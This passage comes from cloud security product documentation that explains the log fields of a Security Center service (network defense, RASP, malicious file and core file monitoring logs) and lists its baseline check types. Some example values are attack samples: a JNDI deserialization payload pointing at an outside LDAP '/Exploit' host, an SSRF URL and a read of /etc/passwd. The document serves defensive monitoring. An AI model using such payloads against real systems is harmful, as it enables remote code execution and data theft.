The section ID. You can call the ListCheckResult operation to query section IDs. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services.

1

standard_id

The standard ID. You can call the ListCheckStandard operation to query standard IDs. The operation is used to query the standards of configuration checks.

1

status

The status of the check item. Valid values:

  • NOT_CHECK: The check item is not checked.

  • CHECKING: The check item is being checked.

  • PASS: The check item passed the check.

  • NOT_PASS: The check item failed the check.

  • WHITELIST: The check item is added to the whitelist.

PASS

vendor

The cloud service provider. The value is fixed as ALIYUN.

ALIYUN

Network defense logs

Field name

Description

Example

cmd

The command line of the attacked process.

nginx: master process nginx

cur_time

The time when the attack event occurred.

2023-09-14 09:21:59

decode_payload

The decoded hexadecimal payload.

POST /Services/FileService/UserFiles/

dest_ip

The IP address of the attacked asset.

172.16.XX.XX

dest_port

The port of the attacked asset.

80

func

The type of the blocked event. Valid values:

  • payload: indicates that an event is blocked when malicious data or instructions are detected.

  • tuple: indicates that an event is blocked when malicious IP addresses are detected.

payload

rule_type

The type of the rule that is used in the blocked event. Valid values:

  • alinet_payload: indicates a payload defense rule that is specified in Security Center.

  • alinet_tuple: indicates a tuple defense rule that is specified in Security Center.

alinet_payload

instance_id

The instance ID of the attacked asset.

i-2zeg4zldn8zypsfg****

internet_ip

The public IP address of the attacked asset.

39.104.XX.XX

intranet_ip

The private IP address of the attacked asset.

192.168.XX.XX

model

The defense action. The value is fixed as block. The value indicates that the attack is blocked.

block

payload

The hexadecimal payload.

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

The ID of the attacked process.

7107

platform

The type of the operating system of the attacked asset. Valid values:

  • win

  • linux

linux

proc_path

The path to the attacked process.

/usr/sbin/nginx

sas_group_name

The asset group to which the server belongs in Security Center.

default

src_ip

The source IP address of the attack.

106.11.XX.XX

src_port

The source port of the attack.

29575

uuid

The UUID of the server.

5d83b26b-b7ca-4a0a-9267-12****

Application protection logs

Field name

Description

Example

app_dir

The directory in which the application is stored.

/usr/local/aegis/rasp/apps/1111

app_id

The ID of the application.

6492a391fc9b4e2aad94****

app_name

The name of the application.

test

confidence

The confidence level of the detection algorithm. Valid values:

  • high

  • medium

  • low

low

content

The information about the request body.

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

content_length

The length of the request body.

112

data

The hook.

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

The information about the request header.

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

The name of the host or network device.

testhostname

ip

The private IP address of the host.

172.16.XX.XX

is_cliped

Indicates whether the log is truncated due to an excessive length. Valid values:

  • true

  • false

false

jdk

The JDK version.

1.8.0_292

message

The description of the alert.

Unsafe class serial.

method

The method of the request.

Post

os

The type of the operating system.

Linux

os_arch

The architecture of the operating system.

amd64

os_version

The kernel version of the operating system.

3.10.0-1160.59.1.el7.x86_64

param

The request parameter. In most cases, the parameter is in one of the following formats:

  • GET parameter

  • application/x-www-form-urlencoded

{"url":["http://127.0.0.1.xip.io"]}

payload

The attack payload.

bash -c kill -0 -- -'31098'

payload_length

The length of the attack payload.

27

rasp_id

The ID of the Runtime Application Self Protection (RASP) agent.

fa00223c8420e256c0c98ca0bd0d****

rasp_version

The version of the RASP agent.

0.4.3

remote

The IP address from which the request is initiated.

172.0.XX.XX

result

The handling result of the alert. Valid values:

  • block

  • monitor

block

rule_result

The alert handling action that is specified in the application protection rule. Valid values:

  • block

  • monitor

block

severity

The risk level. Valid values:

  • high

  • medium

  • low

high

stacktrace

The stack information.

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

The time when the alert was generated.

2023-10-09 15:19:15

timestamp

The timestamp when the alert was generated. Unit: milliseconds.

1696835955070

type

The type of the vulnerability. Valid values:

  • attach: malicious Attach API

  • beans: malicious beans binding

  • classloader: malicious class loading

  • dangerous_protocol: usage of vulnerable protocols

  • dns: malicious DNS query

  • engine: engine injection

  • expression: expression injection

  • file: malicious file read and write

  • file_delete: arbitrary file deletion

  • file_list: directory traversal

  • file_read: arbitrary file read

  • file_upload: malicious file upload

  • jndi: Java Naming and Directory Interface (JNDI) injection

  • jni: Java Native Interface (JNI) injection

  • jstl: JavaServer Pages Standard Tag Library (JSTL) arbitrary file inclusion

  • memory_shell: in-memory webshell injection

  • rce: command execution

  • read_object: deserialization attack

  • reflect: malicious reflection call

  • sql: SQL injection

  • ssrf: malicious external connection

  • thread_inject: thread injection

  • xxe: XML external entity (XXE) attack

rce

url

The request URL.

http://127.0.0.1:999/xxx

rasp_attack_uuid

The UUID of the vulnerability.

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

The UUID of the host.

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

The public IP address of the host.

1.2.XX.XX

intranet_ip

The private IP address of the host.

172.16.XX.XX

sas_group_name

The group to which the server belongs in Security Center.

Group 1

instance_id

The instance ID of the host.

i-wz995eivg28f1m**

Malicious file detection logs

Field name

Description

Example

bucket_name

The name of the bucket.

***-test

event_id

The ID of the alert.

802210

event_name

The name of the alert.

Mining program

md5

The MD5 value of the file.

6bc2bc******53d409b1

sha256

The SHA-256 hash value of the file.

f038f9525******7772981e87f85

result

The detection result.

  • 0: No malicious file is detected.

  • 1: Malicious files are detected.

0

file_path

The path to the file.

test.zip/bin_test

etag

The ID of the OSS object.

6BC2B******853D409B1

risk_level

The risk level.

  • serious

  • suspicious

  • remind

remind

source

The check method.

  • OSS: Objects in OSS buckets are checked in the Security Center console.

  • API: SDK for Java or Python is used to detect malicious files.

OSS

parent_md5

The MD5 hash value of the parent file or the compressed package file.

3d0f8045bb9******

parent_sha256

The SHA-256 hash value of the parent file or the compressed package file.

69b643d6******a3fb859fa

parent_file_path

The name of the parent file or the compressed package file.

test.zip

start_time

The timestamp when the detection starts. Unit: seconds.

1718678414

Core file monitoring event log

Field name

Description

Example

start_time

The timestamp when the event last happened. Unit: seconds.

1718678414

uuid

The UUID of the server.

5d83b26b-b**a-4**a-9267-12****

file_path

The path to the file.

/etc/passwd

proc_path

The path to the process.

/usr/bin/bash

rule_id

The ID of the hit rule.

123

rule_name

The name of the rule.

file_test_rule

cmdline

The command line.

bash /opt/a

operation

The operation that you want to perform on the file.

READ

risk_level

The risk level.

2

pid

The process ID.

45324

proc_permission

The permissions to run the process.

rwxrwxrwx

instance_id

The instance ID.

i-wz995eivg2****

internet_ip

The IP address.

192.0.2.1

intranet_ip

The private IP address.

172.16.0.1

instance_name

The instance name.

aegis-test

platform

The operating system type.

Linux

Appendix

Baseline types and subtypes

Type

Subtype

Description

hc_exploit

hc_exploit_redis

High risk exploit-Redis unauthorized access high exploit vulnerability risk

hc_exploit_activemq

High risk exploit-ActiveMQ unauthorized access high exploit vulnerability risk

hc_exploit_couchdb

High risk exploit - CouchDB unauthorized access high exploit risk

hc_exploit_docker

High risk exploit - Docker unauthorized access high vulnerability risk

hc_exploit_es

High risk exploit - Elasticsearch unauthorized access high exploit vulnerability risk

hc_exploit_hadoop

High risk exploit - Hadoop unauthorized access high exploit vulnerability risk

hc_exploit_jboss

High risk exploit - Jboss unauthorized access high exploit vulnerability risk

hc_exploit_jenkins

High risk exploit - Jenkins unauthorized access high exploit vulnerability risk

hc_exploit_k8s_api

High risk exploit - Kubernetes Apiserver unauthorized access high exploit vulnerability risk

hc_exploit_ldap

High risk exploit - LDAP unauthorized access high exploit vulnerability risk (Windows)

hc_exploit_ldap_linux

High risk exploit-OpenLDAP unauthorized access vulnerability baseline (Linux)

hc_exploit_memcache

High risk exploit - Memcached unauthorized access high exploit vulnerability risk

hc_exploit_mongo

High risk exploit - Mongodb unauthorized access high exploit vulnerability risk

hc_exploit_pgsql

High risk exploit-Postgresql unauthorized access to high-risk risk baseline

hc_exploit_rabbitmq

High risk exploit-RabbitMQ unauthorized access high exploit vulnerability risk

hc_exploit_rsync

High risk exploit - rsync unauthorized access high exploit vulnerability risk

hc_exploit_tomcat

High risk exploit - Apache Tomcat AJP File Read/Inclusion Vulnerability

hc_exploit_zookeeper

High risk exploit - ZooKeeper unauthorized access high exploit vulnerability risk

hc_container

hc_docker

Alibaba Cloud Standard - Docker Security Baseline Check

hc_middleware_ack_master

Kubernetes(ACK) Master Internationally Agreed Best Practices for Security

hc_middleware_ack_node

Kubernetes(ACK) Node Internationally Agreed Best Practices for Security

hc_middleware_k8s

Alibaba Cloud Standard-Kubernetes-Master security baseline check

hc_middleware_k8s_node

Alibaba Cloud Standard-Kubernetes-Node security baseline check

cis

hc_suse 15_djbh

SUSE Linux 15 Baseline for China classified protection of cybersecurity-Level III

hc_aliyun_linux3_djbh_l3

Alibaba Cloud Linux 3 Baseline for China classified protection of cybersecurity-Level III

hc_aliyun_linux_djbh_l3

Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level III

hc_bind_djbh

China's Level 3 Protection of Cybersecurity - Bind Compliance Baseline Check

hc_centos 6_djbh_l3

CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level III

hc_centos 7_djbh_l3

CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level III

hc_centos 8_djbh_l3

CentOS Linux 8 Baseline for China classified protection of cybersecurity - Level III

hc_debian_djbh_l3

Debian Linux 8/9/10 Baseline for China classified protection of cybersecurity-Level III

hc_iis_djbh

IIS Baseline for China classified protection of cybersecurity-Level III

hc_informix_djbh

China's Level 3 Protection of Cybersecurity - Informix Compliance Baseline Check

hc_jboss_djbh

China's Level 3 Protection of Cybersecurity - Jboss6/7 Compliance Baseline Check

hc_mongo_djbh

MongoDB Baseline for China classified protection of cybersecurity-Level III

hc_mssql_djbh

China's Level 3 Protection of Cybersecurity -SQL Server Compliance Baseline Check

hc_mysql_djbh

Equal Guarantee Level 3-MySql Compliance Baseline Check

hc_nginx_djbh

Equal Guarantee Level 3-Nginx Compliance Baseline Check

hc_oracle_djbh

China's Level 3 Protection of Cybersecurity - Oracle Compliance Baseline Check

hc_pgsql_djbh

Level 3-PostgreSql compliance baseline check

hc_redhat 6_djbh_l3

China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 6 Compliance Baseline Check

hc_redhat_djbh_l3

China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 7 Compliance Baseline Check

hc_redis_djbh

Redis Baseline for China classified protection of cybersecurity-Level III

hc_suse 10_djbh_l3

SUSE Linux 10 Baseline for China classified protection of cybersecurity-Level III

hc_suse 12_djbh_l3

SUSE Linux 12 Baseline for China classified protection of cybersecurity-Level III

hc_suse_djbh_l3

SUSE Linux 11 Baseline for China classified protection of cybersecurity-Level III

hc_ubuntu 14_djbh_l3

Ubuntu 14 Baseline for China classified protection of cybersecurity-Level III

hc_ubuntu_djbh_l3

Waiting for Level 3-Ubuntu 16/18/20 compliance regulations inspection

hc_was_djbh

China's Level 3 Protection of Cybersecurity - Websphere Application Server Compliance Baseline Check

hc_weblogic_djbh

Weblogic Baseline for China classified protection of cybersecurity-Level III

hc_win 2008_djbh_l3

China's Level 3 Protection of Cybersecurity - Windows Server 2008 R2 Compliance Baseline Check

hc_win 2012_djbh_l3

Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level III

hc_win 2016_djbh_l3

Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level III

hc_aliyun_linux_djbh_l2

Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level II

hc_centos 6_djbh_l2

CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level II

hc_centos 7_djbh_l2

CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level II

hc_debian_djbh_l2

Debian Linux 8 Baseline for China classified protection of cybersecurity-Level II

hc_redhat 7_djbh_l2

Redhat Linux 7 Baseline for China classified protection of cybersecurity-Level II

hc_ubuntu_djbh_l2

Linux Ubuntu 16/18 Baseline for China classified protection of cybersecurity-Level II

hc_win 2008_djbh_l2

Windows 2008 R2 Baseline for China classified protection of cybersecurity-Level II

hc_win 2012_djbh_l2

Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level II

hc_win 2016_djbh_l2

Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level II

hc_aliyun_linux_cis

Alibaba Cloud Linux 2 Internationally Agreed Best Practices for Security

hc_centos 6_cis_rules

CentOS Linux 6 LTS Internationally Agreed Best Practices for Security

hc_centos 7_cis_rules

CentOS Linux 7 LTS Internationally Agreed Best Practices for Security

hc_centos 8_cis_rules

CentOS Linux 8 LTS Internationally Agreed Best Practices for Security

hc_debian 8_cis_rules

Debian Linux 8 Internationally Agreed Best Practices for Security

hc_ubuntu 14_cis_rules

Ubuntu 14 LTS Internationally Agreed Best Practices for Security

hc_ubuntu 16_cis_rules

Ubuntu 16/18/20 LTS Internationally Agreed Best Practices for Security

hc_win 2008_cis_rules

Windows Server 2008 R2 Internationally Agreed Best Practices for Security

hc_win 2012_cis_rules

Windows Server 2012 R2 Internationally Agreed Best Practices for Security

hc_win 2016_cis_rules

Windows Server 2016/2019 R2 Internationally Agreed Best Practices for Security

hc_kylin_djbh_l3

China's Level 3 Protection of Cybersecurity - Kylin Compliance Baseline Check

hc_uos_djbh_l3

China's Level 3 Protection of Cybersecurity - uos Compliance Baseline Check

hc_best_security

hc_aliyun_linux

Alibaba Cloud Linux/Aliyun Linux 2 Benchmark

hc_centos 6

Alibaba Cloud Standard - CentOS Linux 6 Security Baseline Check

hc_centos 7

Alibaba Cloud Standard - CentOS Linux 7/8 Security Baseline Check

hc_debian

Alibaba Cloud Standard - Debian Linux 8/9/10 Security Baseline

hc_redhat 6

Alibaba Cloud Standard - Red Hat Enterprise Linux 6 Security Baseline Check

hc_redhat 7

Alibaba Cloud Standard - Red Hat Enterprise Linux 7/8 Security Baseline Check

hc_ubuntu

Alibaba Cloud Standard - Ubuntu Security Baseline

hc_windows_2008

Alibaba Cloud Standard - Windows Server 2008 R2 Security Baseline Check

hc_windows_2012

Alibaba Cloud Standard - Windows 2012 R2 Security Baseline

hc_windows_2016

Alibaba Cloud Standard - Windows 2016/2019 Security Baseline

hc_db_mssql

Alibaba Cloud Standard-SQL Server Security Baseline Check

hc_memcached_ali

Alibaba Cloud Standard - Memcached Security Baseline Check

hc_mongodb

Alibaba Cloud Standard - MongoDB version 3.x Security Baseline Check

hc_mysql_ali

Alibaba Cloud Standard - Mysql Security Baseline Check

hc_oracle

Alibaba Cloud Standard - Oracle 11g Security Baseline Check

hc_pgsql_ali

Alibaba Cloud Standard-PostgreSql Security Initialization Check

hc_redis_ali

Alibaba Cloud Standard - Redis Security Baseline Check

hc_apache

Alibaba Cloud Standard - Apache Security Baseline Check

hc_iis_8

Alibaba Cloud Standard - IIS 8 Security Baseline Check

hc_nginx_linux

Alibaba Cloud Standard - Nginx Security Baseline Check

hc_suse 15

Alibaba Cloud Standard - SUSE Linux 15 Security Baseline Check

tomcat 7

Alibaba Cloud Standard-Apache Tomcat Security Baseline

weak_password

hc_mongodb_pwd

Weak Password-MongoDB Weak Password baseline(support version 2. X)

hc_weakpwd_ftp_linux

Weak password - Ftp login weak password baseline

hc_weakpwd_linux_sys

Weak password - Linux system login weak password baseline

hc_weakpwd_mongodb 3

Weak Password-MongoDB Weak Password baseline

hc_weakpwd_mssql

Weak password-SQL Server DB login weak password baseline

hc_weakpwd_mysql_linux

Weak password - Mysql DB login weak password baseline

hc_weakpwd_mysql_win

Weak password - Mysql DB login weak password baseline(Windows version)

hc_weakpwd_openldap

Weak password - Openldap login weak password baseline

hc_weakpwd_oracle

Weak Password-Oracle login weak password detection

hc_weakpwd_pgsql

Weak password - PostgreSQL DB login weak password baseline

hc_weakpwd_pptp

Weak password - pptpd login weak password baseline

hc_weakpwd_redis_linux

Weak password - Redis DB login weak password baseline

hc_weakpwd_rsync

Weak password - rsync login weak password baseline

hc_weakpwd_svn

Weak password - svn login weak password baseline

hc_weakpwd_tomcat_linux

Weak password - Apache Tomcat Console weak password baseline

hc_weakpwd_vnc

Weak password-VncServer weak password check

hc_weakpwd_weblogic

Weak password-Weblogic 12c login weak password detection

hc_weakpwd_win_sys

Weak password - Windows system login weak password baseline

References

[Notice] Log dictionaries are upgraded

[Notice] Log dictionaries are upgraded

Manually upgrade log dictionaries to V2.0